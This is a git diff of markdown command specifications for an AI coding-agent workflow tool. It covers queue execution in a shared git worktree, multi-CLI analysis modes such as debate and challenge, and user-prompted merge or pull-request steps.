// Prune stale worktrees from previous interrupted executions
Bash('git worktree prune');
}
// Parse existing worktree path from args if provided
// Example: --worktree /path/to/existing/worktree
const existingWorktree = args.worktree && typeof args.worktree === 'string' ? args.worktree : null;
// Setup ONE worktree for entire queue (not per-solution)
let worktreePath = null;
let worktreeBranch = null;
if (useWorktree) {
const repoRoot = Bash('git rev-parse --show-toplevel').trim();
const worktreeBase = `${repoRoot}/.ccw/worktrees`;
Bash(`mkdir -p "${worktreeBase}"`);
Bash('git worktree prune'); // Cleanup stale worktrees
if (existingWorktree) {
// Resume mode: Use existing worktree
worktreePath = existingWorktree;
worktreeBranch = Bash(`git -C "${worktreePath}" branch --show-current`).trim();
console.log(`Resuming in existing worktree: ${worktreePath} (branch: ${worktreeBranch})`);
} else {
// Create mode: ONE worktree for the entire queue
const timestamp = new Date().toISOString().replace(/[-:T]/g, '').slice(0, 14);
worktreeBranch = `queue-exec-${dag.queue_id || timestamp}`;
worktreePath = `${worktreeBase}/${worktreeBranch}`;
Bash(`git worktree add "${worktreePath}" -b "${worktreeBranch}"`);
console.log(`Created queue worktree: ${worktreePath}`);
}
}
// Launch ALL solutions in batch in parallel (DAG guarantees no conflicts)
// All executors work in the SAME worktree (or main if no worktree)
const executions = batch.map(solutionId => {
updateTodo(solutionId, 'in_progress');
return dispatchExecutor(solutionId, executor, useWorktree, existingWorktree);
return dispatchExecutor(solutionId, executor, worktreePath);
});
await Promise.all(executions);
@@ -185,126 +308,20 @@ batch.forEach(id => updateTodo(id, 'completed'));
### Executor Dispatch
```javascript
function dispatchExecutor(solutionId, executorType, useWorktree = false, existingWorktree = null) {
// Worktree setup commands (if enabled) - using absolute paths
// Supports both creating new worktrees and resuming in existing ones
const worktreeSetup = useWorktree ? `
### Step 0: Setup Isolated Worktree
\`\`\`bash
# Use absolute paths to avoid issues when running from subdirectories
REPO_ROOT=$(git rev-parse --show-toplevel)
WORKTREE_BASE="\${REPO_ROOT}/.ccw/worktrees"
# Check if existing worktree path was provided
EXISTING_WORKTREE="${existingWorktree || ''}"
if [[ -n "\${EXISTING_WORKTREE}" && -d "\${EXISTING_WORKTREE}" ]]; then
# Resume mode: Use existing worktree
WORKTREE_PATH="\${EXISTING_WORKTREE}"
WORKTREE_NAME=$(basename "\${WORKTREE_PATH}")
# Verify it's a valid git worktree
if ! git -C "\${WORKTREE_PATH}" rev-parse --is-inside-work-tree &>/dev/null; then
echo "Error: \${EXISTING_WORKTREE} is not a valid git worktree"
exit 1
fi
echo "Resuming in existing worktree: \${WORKTREE_PATH}"
else
# Create mode: New worktree with timestamp
WORKTREE_NAME="exec-${solutionId}-$(date +%H%M%S)"
WORKTREE_PATH="\${WORKTREE_BASE}/\${WORKTREE_NAME}"
# Ensure worktree base exists
mkdir -p "\${WORKTREE_BASE}"
# Prune stale worktrees
git worktree prune
# Create worktree
git worktree add "\${WORKTREE_PATH}" -b "\${WORKTREE_NAME}"
echo "Created new worktree: \${WORKTREE_PATH}"
fi
# Setup cleanup trap for graceful failure handling
cleanup_worktree() {
echo "Cleaning up worktree due to interruption..."
cd "\${REPO_ROOT}" 2>/dev/null || true
git worktree remove "\${WORKTREE_PATH}" --force 2>/dev/null || true
echo "Worktree removed. Branch '\${WORKTREE_NAME}' kept for inspection."
}
trap cleanup_worktree EXIT INT TERM
cd "\${WORKTREE_PATH}"
\`\`\`
` : '';
const worktreeCleanup = useWorktree ? `
### Step 5: Worktree Completion (User Choice)
After all tasks complete, prompt for merge strategy:
\`\`\`javascript
AskUserQuestion({
questions: [{
question: "Solution ${solutionId} completed. What to do with worktree branch?",
header: "Merge",
multiSelect: false,
options: [
{ label: "Create PR (Recommended)", description: "Push branch and create pull request - safest for parallel execution" },
{ label: "Merge to main", description: "Merge branch and cleanup worktree (requires clean main)" },
{ label: "Keep branch", description: "Cleanup worktree, keep branch for manual handling" }
]
}]
})
\`\`\`
**Based on selection:**
\`\`\`bash
# Disable cleanup trap before intentional cleanup
trap - EXIT INT TERM
# Return to repo root (use REPO_ROOT from setup)
cd "\${REPO_ROOT}"
# Validate main repo state before merge
validate_main_clean() {
if [[ -n \$(git status --porcelain) ]]; then
echo "⚠️ Warning: Main repo has uncommitted changes."
echo "Cannot auto-merge. Falling back to 'Create PR' option."
return 1
fi
return 0
}
# Create PR (Recommended for parallel execution):
git push -u origin "\${WORKTREE_NAME}"
gh pr create --title "Solution ${solutionId}" --body "Issue queue execution"
git worktree remove "\${WORKTREE_PATH}"
# Merge to main (only if main is clean):
if validate_main_clean; then
git merge --no-ff "\${WORKTREE_NAME}" -m "Merge solution ${solutionId}"
git worktree remove "\${WORKTREE_PATH}" && git branch -d "\${WORKTREE_NAME}"
else
# Fallback to PR if main is dirty
git push -u origin "\${WORKTREE_NAME}"
gh pr create --title "Solution ${solutionId}" --body "Issue queue execution (main had uncommitted changes)"
git worktree remove "\${WORKTREE_PATH}"
fi
# Keep branch:
git worktree remove "\${WORKTREE_PATH}"
echo "Branch \${WORKTREE_NAME} kept for manual handling"
\`\`\`
**Parallel Execution Safety**: "Create PR" is the default and safest option for parallel executors, avoiding merge race conditions.
` : '';
// worktreePath: path to shared worktree (null if not using worktree)
function dispatchExecutor(solutionId, executorType, worktreePath = null) {
// If worktree is provided, executor works in that directory
// No per-solution worktree creation - ONE worktree for entire queue
const cdCommand = worktreePath ? `cd "${worktreePath}"` : '';
const prompt = `
## Execute Solution ${solutionId}
${worktreeSetup}
${worktreePath ? `
### Step 0: Enter Queue Worktree
\`\`\`bash
cd "${worktreePath}"
\`\`\`
` : ''}
### Step 1: Get Solution (read-only)
\`\`\`bash
ccw issue detail ${solutionId}
@@ -352,16 +369,21 @@ If any task failed:
\`\`\`bash
ccw issue done ${solutionId} --fail --reason '{"task_id": "TX", "error_type": "test_failure", "message": "..."}'
\`\`\`
${worktreeCleanup}`;
**Note**: Do NOT cleanup worktree after this solution. Worktree is shared by all solutions in the queue.
`;
// For CLI tools, pass --cd to set working directory
const cdOption = worktreePath ? ` --cd "${worktreePath}"` : '';
if (executorType === 'codex') {
return Bash(
`ccw cli -p "${escapePrompt(prompt)}" --tool codex --mode write --id exec-${solutionId}`,
`ccw cli -p "${escapePrompt(prompt)}" --tool codex --mode write --id exec-${solutionId}${cdOption}`,
{ timeout: 7200000, run_in_background: true } // 2hr for full solution
);
} else if (executorType === 'gemini') {
return Bash(
`ccw cli -p "${escapePrompt(prompt)}" --tool gemini --mode write --id exec-${solutionId}`,
`ccw cli -p "${escapePrompt(prompt)}" --tool gemini --mode write --id exec-${solutionId}${cdOption}`,
{ timeout: 3600000, run_in_background: true }
);
} else {
@@ -369,7 +391,7 @@ ${worktreeCleanup}`;
subagent_type: 'code-developer',
run_in_background: false,
description: `Execute solution ${solutionId}`,
prompt: prompt
prompt: worktreePath ? `Working directory: ${worktreePath}\n\n${prompt}` : prompt
});
}
}
@@ -378,8 +400,8 @@ ${worktreeCleanup}`;
### Phase 3: Check Next Batch
```javascript
// Refresh DAG after batch completes
const refreshedDag = JSON.parse(Bash(`ccw issue queue dag`).trim());
// Refresh DAG after batch completes (use same QUEUE_ID)
const refreshedDag = JSON.parse(Bash(`ccw issue queue dag --queue ${QUEUE_ID}`).trim());
console.log(`
## Batch Complete
@@ -389,46 +411,117 @@ console.log(`
`);
if (refreshedDag.ready_count > 0) {
console.log('Run `/issue:execute` again for next batch.');
console.log(`Run \`/issue:execute --queue ${QUEUE_ID}\` again for next batch.`);
// Note: If resuming, pass existing worktree path:
// /issue:execute --queue ${QUEUE_ID} --worktree <worktreePath>
}
```
### Phase 4: Worktree Completion (after ALL batches)
```javascript
// Only run when ALL solutions completed AND using worktree
if (useWorktree && refreshedDag.ready_count === 0 && refreshedDag.completed_count === refreshedDag.total) {
console.log('\n## All Solutions Completed - Worktree Cleanup');
const answer = AskUserQuestion({
questions: [{
question: `Queue complete. What to do with worktree branch "${worktreeBranch}"?`,
header: 'Merge',
multiSelect: false,
options: [
{ label: 'Create PR (Recommended)', description: 'Push branch and create pull request' },
{ label: 'Merge to main', description: 'Merge all commits and cleanup worktree' },
{ label: 'Keep branch', description: 'Cleanup worktree, keep branch for manual handling' }
]
}]
});
const repoRoot = Bash('git rev-parse --show-toplevel').trim();
if (answer['Merge'].includes('Create PR')) {
Bash(`git -C "${worktreePath}" push -u origin "${worktreeBranch}"`);
Bash(`gh pr create --title "Queue ${dag.queue_id}" --body "Issue queue execution - all solutions completed" --head "${worktreeBranch}"`);
Bash(`git worktree remove "${worktreePath}"`);
console.log(`PR created for branch: ${worktreeBranch}`);
} else if (answer['Merge'].includes('Merge to main')) {
// Check main is clean
const mainDirty = Bash('git status --porcelain').trim();
if (mainDirty) {
console.log('Warning: Main has uncommitted changes. Falling back to PR.');
Bash(`git -C "${worktreePath}" push -u origin "${worktreeBranch}"`);
Bash(`gh pr create --title "Queue ${dag.queue_id}" --body "Issue queue execution (main had uncommitted changes)" --head "${worktreeBranch}"`);
} else {
Bash(`git merge --no-ff "${worktreeBranch}" -m "Merge queue ${dag.queue_id}"`);
Bash(`git branch -d "${worktreeBranch}"`);
}
Bash(`git worktree remove "${worktreePath}"`);
} else {
Bash(`git worktree remove "${worktreePath}"`);
console.log(`Branch ${worktreeBranch} kept for manual handling`);
}
}
```
## Parallel Execution Model
```
┌─────────────────────────────────────────────────────────────┐
│ Orchestrator │
├─────────────────────────────────────────────────────────────┤
1. ccw issue queue dag
→ { parallel_batches: [["S-1","S-2"], ["S-3"]] }
2. Dispatch batch 1 (parallel):
┌──────────────────────┐ ┌──────────────────────┐
│ Executor 1 │ │ Executor 2 │
│ detail S-1 │ │ detail S-2
│ → gets full solution │ │ → gets full solution │
│ [T1→T2→T3 sequential]│ │ [T1→T2 sequential] │
│ commit (1x solution) │ │ commit (1x solution) │
│ │ done S-1 │ │ done S-2
└──────────────────────┘ └──────────────────────┘
3. ccw issue queue dag (refresh)
→ S-3 now ready (S-1 completed, file conflict resolved)
└─────────────────────────────────────────────────────────────┘
┌─────────────────────────────────────────────────────────────────
│ Orchestrator
├─────────────────────────────────────────────────────────────────
0. Validate QUEUE_ID (required, or prompt user to select)
0.5 (if --worktree) Create ONE worktree for entire queue
→ .ccw/worktrees/queue-exec-<queue-id>
1. ccw issue queue dag --queue ${QUEUE_ID}
→ { parallel_batches: [["S-1","S-2"], ["S-3"]] }
2. Dispatch batch 1 (parallel, SAME worktree):
┌──────────────────────────────────────────────────────┐
│ │ Shared Queue Worktree (or main) │ │
│ ┌──────────────────┐ ┌──────────────────┐ │
│ Executor 1 │ │ Executor 2
│ │ detail S-1 │ │ detail S-2
│ │ [T1→T2→T3] │ │ [T1→T2] │ │
│ │ │ commit S-1 │ │ commit S-2 │ │ │
│ │ │ done S-1 │ │ done S-2 │ │ │
│ │ └──────────────────┘ └──────────────────┘ │ │
│ └──────────────────────────────────────────────────────┘ │
│ │
│ 3. ccw issue queue dag (refresh) │
│ → S-3 now ready → dispatch batch 2 (same worktree) │
│ │
│ 4. (if --worktree) ALL batches complete → cleanup worktree │
│ → Prompt: Create PR / Merge to main / Keep branch │
└─────────────────────────────────────────────────────────────────┘
```
**Why this works for parallel:**
- **ONE worktree for entire queue** → all solutions share same isolated workspace
- `detail <id>` is READ-ONLY → no race conditions
- Each executor handles **all tasks within a solution** sequentially
- **One commit per solution** with formatted summary (not per-task)
- `done <id>` updates only its own solution status
- `queue dag` recalculates ready solutions after each batch
- Solutions in same batch have NO file conflicts
- Solutions in same batch have NO file conflicts (DAG guarantees)
- **Main workspace stays clean** until merge/PR decision
## CLI Endpoint Contract
### `ccw issue queue dag`
Returns dependency graph with parallel batches (solution-level):
### `ccw issue queue list --brief --json`
Returns queue index for selection (used when --queue not provided):
```json
{
"active_queue_id": "QUE-20251215-001",
"queues": [
{ "id": "QUE-20251215-001", "status": "active", "issue_ids": ["ISS-001"], "total_solutions": 5, "completed_solutions": 2 }
]
}
```
### `ccw issue queue dag --queue <queue-id>`
Returns dependency graph with parallel batches (solution-level, **--queue required**):
```json
{
"queue_id": "QUE-...",

View File

@@ -311,6 +311,12 @@ Output:
└─ .workflow/.debug/DBG-{slug}-{date}/debug.log
```
## Post-Completion Expansion
完成后询问用户是否扩展为issue(test/enhance/refactor/doc),选中项调用 `/issue:new "{summary} - {dimension}"`
---
## Error Handling
| Situation | Action |

View File

@@ -275,6 +275,10 @@ AskUserQuestion({
- **"Enter Review"**: Execute `/workflow:review`
- **"Complete Session"**: Execute `/workflow:session:complete`
### Post-Completion Expansion
完成后询问用户是否扩展为issue(test/enhance/refactor/doc),选中项调用 `/issue:new "{summary} - {dimension}"`
## Execution Strategy (IMPL_PLAN-Driven)
### Strategy Priority

View File

@@ -664,6 +664,10 @@ Collected after each execution call completes:
Appended to `previousExecutionResults` array for context continuity in multi-execution scenarios.
## Post-Completion Expansion
完成后询问用户是否扩展为issue(test/enhance/refactor/doc),选中项调用 `/issue:new "{summary} - {dimension}"`
**Fixed ID Pattern**: `${sessionId}-${groupId}` enables predictable lookup without auto-generated timestamps.
**Resume Usage**: If `status` is "partial" or "failed", use `fixedCliId` to resume:

View File

@@ -0,0 +1,433 @@
---
name: workflow:lite-lite-lite
description: Ultra-lightweight multi-tool analysis and direct execution. No artifacts, auto tool selection based on task analysis, user-driven iteration via AskUser.
argument-hint: "<task description>"
allowed-tools: TodoWrite(*), Task(*), AskUserQuestion(*), Read(*), Bash(*), mcp__ace-tool__search_context(*)
---
# Ultra-Lite Multi-Tool Workflow
## Quick Start
```bash
/workflow:lite-lite-lite "Fix the login bug"
/workflow:lite-lite-lite "Refactor payment module for multi-gateway support"
```
**Core Philosophy**: Minimal friction, maximum velocity. No files, no artifacts - just analyze and execute.
## Overview
**Zero-artifact workflow**: Clarify → Select Tools → Multi-Mode Analysis → Decision → Direct Execution
**vs multi-cli-plan**: No IMPL_PLAN.md, plan.json, synthesis.json - all state in memory.
## Execution Flow
```
Phase 1: Clarify Requirements → AskUser for missing details
Phase 2: Select Tools (CLI → Mode → Agent) → 3-step selection
Phase 3: Multi-Mode Analysis → Execute with --resume chaining
Phase 4: User Decision → Execute / Refine / Change / Cancel
Phase 5: Direct Execution → No plan files, immediate implementation
```
## Phase 1: Clarify Requirements
```javascript
const taskDescription = $ARGUMENTS
if (taskDescription.length < 20 || isAmbiguous(taskDescription)) {
AskUserQuestion({
questions: [{
question: "Please provide more details: target files/modules, expected behavior, constraints?",
header: "Details",
options: [
{ label: "I'll provide more", description: "Add more context" },
{ label: "Continue analysis", description: "Let tools explore autonomously" }
],
multiSelect: false
}]
})
}
// Optional: Quick ACE Context for complex tasks
mcp__ace-tool__search_context({
project_root_path: process.cwd(),
query: `${taskDescription} implementation patterns`
})
```
## Phase 2: Select Tools
### Tool Definitions
**CLI Tools** (from cli-tools.json):
```javascript
const cliConfig = JSON.parse(Read("~/.claude/cli-tools.json"))
const cliTools = Object.entries(cliConfig.tools)
.filter(([_, config]) => config.enabled)
.map(([name, config]) => ({
name, type: 'cli',
tags: config.tags || [],
model: config.primaryModel,
toolType: config.type // builtin, cli-wrapper, api-endpoint
}))
```
**Sub Agents**:
| Agent | Strengths | canExecute |
|-------|-----------|------------|
| **code-developer** | Code implementation, test writing | ✅ |
| **Explore** | Fast code exploration, pattern discovery | ❌ |
| **cli-explore-agent** | Dual-source analysis (Bash+CLI) | ❌ |
| **cli-discuss-agent** | Multi-CLI collaboration, cross-verification | ❌ |
| **debug-explore-agent** | Hypothesis-driven debugging | ❌ |
| **context-search-agent** | Multi-layer file discovery, dependency analysis | ❌ |
| **test-fix-agent** | Test execution, failure diagnosis, code fixing | ✅ |
| **universal-executor** | General execution, multi-domain adaptation | ✅ |
**Analysis Modes**:
| Mode | Pattern | Use Case | minCLIs |
|------|---------|----------|---------|
| **Parallel** | `A \|\| B \|\| C → Aggregate` | Fast multi-perspective | 1+ |
| **Sequential** | `A → B(resume) → C(resume)` | Incremental deepening | 2+ |
| **Collaborative** | `A → B → A → B → Synthesize` | Multi-round refinement | 2+ |
| **Debate** | `A(propose) → B(challenge) → A(defend)` | Adversarial validation | 2 |
| **Challenge** | `A(analyze) → B(challenge)` | Find flaws and risks | 2 |
### Three-Step Selection Flow
```javascript
// Step 1: Select CLIs (multiSelect)
AskUserQuestion({
questions: [{
question: "Select CLI tools for analysis (1-3 for collaboration modes)",
header: "CLI Tools",
options: cliTools.map(cli => ({
label: cli.name,
description: cli.tags.length > 0 ? cli.tags.join(', ') : cli.model || 'general'
})),
multiSelect: true
}]
})
// Step 2: Select Mode (filtered by CLI count)
const availableModes = analysisModes.filter(m => selectedCLIs.length >= m.minCLIs)
AskUserQuestion({
questions: [{
question: "Select analysis mode",
header: "Mode",
options: availableModes.map(m => ({
label: m.label,
description: `${m.description} [${m.pattern}]`
})),
multiSelect: false
}]
})
// Step 3: Select Agent for execution
AskUserQuestion({
questions: [{
question: "Select Sub Agent for execution",
header: "Agent",
options: agents.map(a => ({ label: a.name, description: a.strength })),
multiSelect: false
}]
})
// Confirm selection
AskUserQuestion({
questions: [{
question: "Confirm selection?",
header: "Confirm",
options: [
{ label: "Confirm and continue", description: `${selectedMode.label} with ${selectedCLIs.length} CLIs` },
{ label: "Re-select CLIs", description: "Choose different CLI tools" },
{ label: "Re-select Mode", description: "Choose different analysis mode" },
{ label: "Re-select Agent", description: "Choose different Sub Agent" }
],
multiSelect: false
}]
})
```
## Phase 3: Multi-Mode Analysis
### Universal CLI Prompt Template
```javascript
// Unified prompt builder - used by all modes
function buildPrompt({ purpose, tasks, expected, rules, taskDescription }) {
return `
PURPOSE: ${purpose}: ${taskDescription}
TASK: ${tasks.map(t => `${t}`).join(' ')}
MODE: analysis
CONTEXT: @**/*
EXPECTED: ${expected}
RULES: $(cat ~/.claude/workflows/cli-templates/protocols/analysis-protocol.md) | ${rules}
`
}
// Execute CLI with prompt
function execCLI(cli, prompt, options = {}) {
const { resume, background = false } = options
const resumeFlag = resume ? `--resume ${resume}` : ''
return Bash({
command: `ccw cli -p "${prompt}" --tool ${cli.name} --mode analysis ${resumeFlag}`,
run_in_background: background
})
}
```
### Prompt Presets by Role
| Role | PURPOSE | TASKS | EXPECTED | RULES |
|------|---------|-------|----------|-------|
| **initial** | Initial analysis | Identify files, Analyze approach, List changes | Root cause, files, changes, risks | Focus on actionable insights |
| **extend** | Build on previous | Review previous, Extend, Add insights | Extended analysis building on findings | Build incrementally, avoid repetition |
| **synthesize** | Refine and synthesize | Review, Identify gaps, Synthesize | Refined synthesis with new perspectives | Add value not repetition |
| **propose** | Propose comprehensive analysis | Analyze thoroughly, Propose solution, State assumptions | Well-reasoned proposal with trade-offs | Be clear about assumptions |
| **challenge** | Challenge and stress-test | Identify weaknesses, Question assumptions, Suggest alternatives | Critique with counter-arguments | Be adversarial but constructive |
| **defend** | Respond to challenges | Address challenges, Defend valid aspects, Propose refined solution | Refined proposal incorporating feedback | Be open to criticism, synthesize |
| **criticize** | Find flaws ruthlessly | Find logical flaws, Identify edge cases, Rate criticisms | Critique with severity: [CRITICAL]/[HIGH]/[MEDIUM]/[LOW] | Be ruthlessly critical |
```javascript
const PROMPTS = {
initial: { purpose: 'Initial analysis', tasks: ['Identify affected files', 'Analyze implementation approach', 'List specific changes'], expected: 'Root cause, files to modify, key changes, risks', rules: 'Focus on actionable insights' },
extend: { purpose: 'Build on previous analysis', tasks: ['Review previous findings', 'Extend analysis', 'Add new insights'], expected: 'Extended analysis building on previous', rules: 'Build incrementally, avoid repetition' },
synthesize: { purpose: 'Refine and synthesize', tasks: ['Review previous', 'Identify gaps', 'Add insights', 'Synthesize findings'], expected: 'Refined synthesis with new perspectives', rules: 'Build collaboratively, add value' },
propose: { purpose: 'Propose comprehensive analysis', tasks: ['Analyze thoroughly', 'Propose solution', 'State assumptions clearly'], expected: 'Well-reasoned proposal with trade-offs', rules: 'Be clear about assumptions' },
challenge: { purpose: 'Challenge and stress-test', tasks: ['Identify weaknesses', 'Question assumptions', 'Suggest alternatives', 'Highlight overlooked risks'], expected: 'Constructive critique with counter-arguments', rules: 'Be adversarial but constructive' },
defend: { purpose: 'Respond to challenges', tasks: ['Address each challenge', 'Defend valid aspects', 'Acknowledge valid criticisms', 'Propose refined solution'], expected: 'Refined proposal incorporating alternatives', rules: 'Be open to criticism, synthesize best ideas' },
criticize: { purpose: 'Stress-test and find weaknesses', tasks: ['Find logical flaws', 'Identify missed edge cases', 'Propose alternatives', 'Rate criticisms (High/Medium/Low)'], expected: 'Detailed critique with severity ratings', rules: 'Be ruthlessly critical, find every flaw' }
}
```
### Mode Implementations
```javascript
// Parallel: All CLIs run simultaneously
async function executeParallel(clis, task) {
return await Promise.all(clis.map(cli =>
execCLI(cli, buildPrompt({ ...PROMPTS.initial, taskDescription: task }), { background: true })
))
}
// Sequential: Each CLI builds on previous via --resume
async function executeSequential(clis, task) {
const results = []
let prevId = null
for (const cli of clis) {
const preset = prevId ? PROMPTS.extend : PROMPTS.initial
const result = await execCLI(cli, buildPrompt({ ...preset, taskDescription: task }), { resume: prevId })
results.push(result)
prevId = extractSessionId(result)
}
return results
}
// Collaborative: Multi-round synthesis
async function executeCollaborative(clis, task, rounds = 2) {
const results = []
let prevId = null
for (let r = 0; r < rounds; r++) {
for (const cli of clis) {
const preset = !prevId ? PROMPTS.initial : PROMPTS.synthesize
const result = await execCLI(cli, buildPrompt({ ...preset, taskDescription: task }), { resume: prevId })
results.push({ cli: cli.name, round: r, result })
prevId = extractSessionId(result)
}
}
return results
}
// Debate: Propose → Challenge → Defend
async function executeDebate(clis, task) {
const [cliA, cliB] = clis
const results = []
const propose = await execCLI(cliA, buildPrompt({ ...PROMPTS.propose, taskDescription: task }))
results.push({ phase: 'propose', cli: cliA.name, result: propose })
const challenge = await execCLI(cliB, buildPrompt({ ...PROMPTS.challenge, taskDescription: task }), { resume: extractSessionId(propose) })
results.push({ phase: 'challenge', cli: cliB.name, result: challenge })
const defend = await execCLI(cliA, buildPrompt({ ...PROMPTS.defend, taskDescription: task }), { resume: extractSessionId(challenge) })
results.push({ phase: 'defend', cli: cliA.name, result: defend })
return results
}
// Challenge: Analyze → Criticize
async function executeChallenge(clis, task) {
const [cliA, cliB] = clis
const results = []
const analyze = await execCLI(cliA, buildPrompt({ ...PROMPTS.initial, taskDescription: task }))
results.push({ phase: 'analyze', cli: cliA.name, result: analyze })
const criticize = await execCLI(cliB, buildPrompt({ ...PROMPTS.criticize, taskDescription: task }), { resume: extractSessionId(analyze) })
results.push({ phase: 'challenge', cli: cliB.name, result: criticize })
return results
}
```
### Mode Router & Result Aggregation
```javascript
async function executeAnalysis(mode, clis, taskDescription) {
switch (mode.name) {
case 'parallel': return await executeParallel(clis, taskDescription)
case 'sequential': return await executeSequential(clis, taskDescription)
case 'collaborative': return await executeCollaborative(clis, taskDescription)
case 'debate': return await executeDebate(clis, taskDescription)
case 'challenge': return await executeChallenge(clis, taskDescription)
}
}
function aggregateResults(mode, results) {
const base = { mode: mode.name, pattern: mode.pattern, tools_used: results.map(r => r.cli || 'unknown') }
switch (mode.name) {
case 'parallel':
return { ...base, findings: results.map(parseOutput), consensus: findCommonPoints(results), divergences: findDifferences(results) }
case 'sequential':
return { ...base, evolution: results.map((r, i) => ({ step: i + 1, analysis: parseOutput(r) })), finalAnalysis: parseOutput(results.at(-1)) }
case 'collaborative':
return { ...base, rounds: groupByRound(results), synthesis: extractSynthesis(results.at(-1)) }
case 'debate':
return { ...base, proposal: parseOutput(results.find(r => r.phase === 'propose')?.result),
challenges: parseOutput(results.find(r => r.phase === 'challenge')?.result),
resolution: parseOutput(results.find(r => r.phase === 'defend')?.result), confidence: calculateDebateConfidence(results) }
case 'challenge':
return { ...base, originalAnalysis: parseOutput(results.find(r => r.phase === 'analyze')?.result),
critiques: parseCritiques(results.find(r => r.phase === 'challenge')?.result), riskScore: calculateRiskScore(results) }
}
}
```
## Phase 4: User Decision
```javascript
function presentSummary(analysis) {
console.log(`## Analysis Result\n**Mode**: ${analysis.mode} (${analysis.pattern})\n**Tools**: ${analysis.tools_used.join(' → ')}`)
switch (analysis.mode) {
case 'parallel':
console.log(`### Consensus\n${analysis.consensus.map(c => `- ${c}`).join('\n')}\n### Divergences\n${analysis.divergences.map(d => `- ${d}`).join('\n')}`)
break
case 'sequential':
console.log(`### Evolution\n${analysis.evolution.map(e => `**Step ${e.step}**: ${e.analysis.summary}`).join('\n')}\n### Final\n${analysis.finalAnalysis.summary}`)
break
case 'collaborative':
console.log(`### Rounds\n${Object.entries(analysis.rounds).map(([r, a]) => `**Round ${r}**: ${a.map(x => x.cli).join(' + ')}`).join('\n')}\n### Synthesis\n${analysis.synthesis}`)
break
case 'debate':
console.log(`### Debate\n**Proposal**: ${analysis.proposal.summary}\n**Challenges**: ${analysis.challenges.points?.length || 0} points\n**Resolution**: ${analysis.resolution.summary}\n**Confidence**: ${analysis.confidence}%`)
break
case 'challenge':
console.log(`### Challenge\n**Original**: ${analysis.originalAnalysis.summary}\n**Critiques**: ${analysis.critiques.length} issues\n${analysis.critiques.map(c => `- [${c.severity}] ${c.description}`).join('\n')}\n**Risk Score**: ${analysis.riskScore}/100`)
break
}
}
AskUserQuestion({
questions: [{
question: "How to proceed?",
header: "Next Step",
options: [
{ label: "Execute directly", description: "Implement immediately" },
{ label: "Refine analysis", description: "Add constraints, re-analyze" },
{ label: "Change tools", description: "Different tool combination" },
{ label: "Cancel", description: "End workflow" }
],
multiSelect: false
}]
})
// Routing: Execute → Phase 5 | Refine → Phase 3 | Change → Phase 2 | Cancel → End
```
## Phase 5: Direct Execution
```javascript
// No IMPL_PLAN.md, no plan.json - direct implementation
const executionAgents = agents.filter(a => a.canExecute)
const executionTool = selectedAgent.canExecute ? selectedAgent : selectedCLIs[0]
if (executionTool.type === 'agent') {
Task({
subagent_type: executionTool.name,
run_in_background: false,
description: `Execute: ${taskDescription.slice(0, 30)}`,
prompt: `## Task\n${taskDescription}\n\n## Analysis Results\n${JSON.stringify(aggregatedAnalysis, null, 2)}\n\n## Instructions\n1. Apply changes to identified files\n2. Follow recommended approach\n3. Handle identified risks\n4. Verify changes work correctly`
})
} else {
Bash({
command: `ccw cli -p "
PURPOSE: Implement solution: ${taskDescription}
TASK: ${extractedTasks.join(' • ')}
MODE: write
CONTEXT: @${affectedFiles.join(' @')}
EXPECTED: Working implementation with all changes applied
RULES: $(cat ~/.claude/workflows/cli-templates/protocols/write-protocol.md)
" --tool ${executionTool.name} --mode write`,
run_in_background: false
})
}
```
## TodoWrite Structure
```javascript
TodoWrite({ todos: [
{ content: "Phase 1: Clarify requirements", status: "in_progress", activeForm: "Clarifying requirements" },
{ content: "Phase 2: Select tools", status: "pending", activeForm: "Selecting tools" },
{ content: "Phase 3: Multi-mode analysis", status: "pending", activeForm: "Running analysis" },
{ content: "Phase 4: User decision", status: "pending", activeForm: "Awaiting decision" },
{ content: "Phase 5: Direct execution", status: "pending", activeForm: "Executing" }
]})
```
## Iteration Patterns
| Pattern | Flow |
|---------|------|
| **Direct** | Phase 1 → 2 → 3 → 4(execute) → 5 |
| **Refinement** | Phase 3 → 4(refine) → 3 → 4 → 5 |
| **Tool Adjust** | Phase 2(adjust) → 3 → 4 → 5 |
## Error Handling
| Error | Resolution |
|-------|------------|
| CLI timeout | Retry with secondary model |
| No enabled tools | Ask user to enable tools in cli-tools.json |
| Task unclear | Default to first CLI + code-developer |
| Ambiguous task | Force clarification via AskUser |
| Execution fails | Present error, ask user for direction |
## Comparison with multi-cli-plan
| Aspect | lite-lite-lite | multi-cli-plan |
|--------|----------------|----------------|
| **Artifacts** | None | IMPL_PLAN.md, plan.json, synthesis.json |
| **Session** | Stateless (--resume chaining) | Persistent session folder |
| **Tool Selection** | 3-step (CLI → Mode → Agent) | Config-driven fixed tools |
| **Analysis Modes** | 5 modes with --resume | Fixed synthesis rounds |
| **Best For** | Quick analysis, adversarial validation | Complex multi-step implementations |
## Post-Completion Expansion
完成后询问用户是否扩展为issue(test/enhance/refactor/doc),选中项调用 `/issue:new "{summary} - {dimension}"`
## Related Commands
```bash
/workflow:multi-cli-plan "complex task" # Full planning workflow
/workflow:lite-plan "task" # Single CLI planning
/workflow:lite-execute --in-memory # Direct execution
```

View File

@@ -0,0 +1,510 @@
---
name: workflow:multi-cli-plan
description: Multi-CLI collaborative planning workflow with ACE context gathering and iterative cross-verification. Uses cli-discuss-agent for Gemini+Codex+Claude analysis to converge on optimal execution plan.
argument-hint: "<task description> [--max-rounds=3] [--tools=gemini,codex] [--mode=parallel|serial]"
allowed-tools: TodoWrite(*), Task(*), AskUserQuestion(*), Read(*), Bash(*), Write(*), mcp__ace-tool__search_context(*)
---
# Multi-CLI Collaborative Planning Command
## Quick Start
```bash
# Basic usage
/workflow:multi-cli-plan "Implement user authentication"
# With options
/workflow:multi-cli-plan "Add dark mode support" --max-rounds=3
/workflow:multi-cli-plan "Refactor payment module" --tools=gemini,codex,claude
/workflow:multi-cli-plan "Fix memory leak" --mode=serial
# Resume session
/workflow:lite-execute --session=MCP-xxx
```
**Context Source**: ACE semantic search + Multi-CLI analysis
**Output Directory**: `.workflow/.multi-cli-plan/{session-id}/`
**Default Max Rounds**: 3 (convergence may complete earlier)
**CLI Tools**: @cli-discuss-agent (analysis), @cli-lite-planning-agent (plan generation)
## What & Why
### Core Concept
Multi-CLI collaborative planning with **three-phase architecture**: ACE context gathering → Iterative multi-CLI discussion → Plan generation. Orchestrator delegates analysis to agents, only handles user decisions and session management.
**Process**:
- **Phase 1**: ACE semantic search gathers codebase context
- **Phase 2**: cli-discuss-agent orchestrates Gemini/Codex/Claude for cross-verified analysis
- **Phase 3-5**: User decision → Plan generation → Execution handoff
**vs Single-CLI Planning**:
- **Single**: One model perspective, potential blind spots
